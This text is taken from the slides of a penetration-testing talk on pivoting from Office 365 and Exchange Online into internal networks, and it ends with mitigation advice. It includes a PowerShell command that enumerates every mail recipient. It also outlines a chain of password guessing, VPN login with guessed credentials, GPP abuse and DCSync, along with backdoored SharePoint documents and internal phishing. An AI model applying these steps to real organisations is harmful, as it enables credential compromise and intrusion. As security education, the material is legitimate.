  • 63. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2) Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:tempemail_users.csv -NoTypeInformation
  • 64. Enumeration of Other Domain Users
  • 65. Pivoting to the Internal Network
  • 66. Pivoting to the Internal Network • Single Factor VPN Example ‒ Enumerated user emails on LinkedIn ‒ Guessed passwords against MSOnline with PowerShell ‒ Enumerated VPN interfaces ‒ Logged in with guessed credentials ‒ GPP -> Local admin on DA system ‒ DCSync • “Store passwords using reversible encryption”
  • 67. Pivoting to the Internal Network • Other Routes ‒ Single Factor Services • Management Protocols • RDP • SSH • Sharepoint • Terminal Services – Web Based • Citrix • VDI • Etc.
  • 68. Pivoting to the Internal Network • Malicious OneDrive Documents ‒ Can’t use macros in the online version of excel
  • 69. Pivoting to the Internal Network • Malicious SharePoint Documents ‒ Same concept as OneDrive, just a different platform ‒ Backdoor a document ‒ Edit pages
  • 70. Pivoting to the Internal Network • Send messages from OWA or Skype for Business ‒ Autodiscover is handy ‒ People will trust their co-workers • “Can you look over this word doc for me?”
  • 71. Pivoting to the Internal Network • Attacking Email Accounts ‒ If Autodiscover is enabled, adding an account can be done from anywhere ‒ Email is interesting, but I’d like a shell ‒ This can not be done programmatically with PowerShell (*Easily) ‒ “Malicious Outlook Rules” • Nick Landers – Silent Break Security ‒ “MAPI over HTTP and Mailrule Pwnage” • Etienne - sensepost
  • 73. Attack Mitigations • Enable Dual factor authentication for external endpoints* *On all channels
  • 74. Attack Mitigations • Limit federation to trusted domains • Limit exposed services surface area • Monitor your Federated and Azure endpoints • Enforce strong password requirements
  • 75. Thanks! • My NetSPI Co-workers ‒ QA/Ideas/Suggestions • My NetSPI Management Team ‒ For giving me time to work on this • Jared Bird - @jaredbird ‒ For asking me about federation years ago